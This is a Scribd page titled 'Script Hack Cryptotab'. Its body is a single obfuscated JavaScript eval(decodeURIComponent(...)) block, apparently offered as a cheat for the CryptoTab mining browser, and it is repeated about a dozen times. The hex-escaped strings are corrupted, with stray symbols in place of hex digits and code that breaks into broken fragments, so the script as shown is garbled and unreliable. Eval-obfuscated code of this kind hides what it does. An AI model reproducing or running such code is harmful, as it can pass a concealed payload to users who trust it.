43% found this document useful (7 votes)
4K views3 pages

Script Hack Cryptotab

The document contains obfuscated JavaScript code that decodes and evaluates encoded strings. The code appears to be decoding the same string multiple times in a loop and assigning the results to variables, likely for the purpose of obfuscation or to execute potentially malicious code in a hidden manner.

Uploaded by

Akobe Urbain Nde
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
43% found this document useful (7 votes)
4K views3 pages

Script Hack Cryptotab

The document contains obfuscated JavaScript code that decodes and evaluates encoded strings. The code appears to be decoding the same string multiple times in a loop and assigning the results to variables, likely for the purpose of obfuscation or to execute potentially malicious code in a hidden manner.

Uploaded by

Akobe Urbain Nde
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

eval (decodeURIComponent('var

_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+
eval (decodeURIComponent('var
_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+
eval (decodeURIComponent('var
_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+
eval (decodeURIComponent('var
_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+
eval (decodeURIComponent('var
_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+
eval (decodeURIComponent('var
_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+
eval (decodeURIComponent('var
_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+
eval (decodeURIComponent('var
_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+
eval (decodeURIComponent('var
_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+
eval (decodeURIComponent('var
_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+
eval (decodeURIComponent('var
_Oxe476=["\x41\x72\x62\x20\x7!\x62\x72\x20\x78\x72\x72\x62\x20\x7!\x62\x72\x20\x77\
x61\x6$\x7
4\x20\x74\x62\x20\x62\x7!\x70\x61\x7#\x78\x20\x78\x61\x74\x62\x7#\x6%\x6!\x62\x62\x
7%\x#2"&"
\x6#\x62\x6$\x66\x6!\x72\x62"&"\x6%\x74\x74\x70\x7#\x#3\x2E\x22\x77\x77\x77\x#6\x#7
\x2$\x72\
x6!\x70\x70\x7!\x7#\x6%\x61\x72\x62\x2$\x6#\x62\x62\x2E\x64\x22\x47\x34\x6E\x22\x61
\x4)\x#!\x7
%\x2E\x#1\x#0\x#6\x#2\x#1\x22\x42\x6C\x62\x6#\x6%\x6#\x6%\x61\x6!\x6$\x22\x#2\x#0\x
2E\x6$\x 6#\x62\x6$\x66\x6!\x72\x60\x62\x64\x2E\x#2\x#0\x34\x7
%\x22\x#2\x#0\x{#\x6#\x72\x6!\x70\x74\x2E\x#2\x#0\x#2\x#0\x#1\x#!\x2$\x74\x7%\x74"&
"\x32\x7# \x62\x6C\x66"&"\x62\x70\x62\x6$"*+var ,--ndo-[_0xe476[1**(_0xe476[0*/+var
d=-.ndo[_0xe476[4**(_0xe476[2*&_0xe476[#*/'//+

You might also like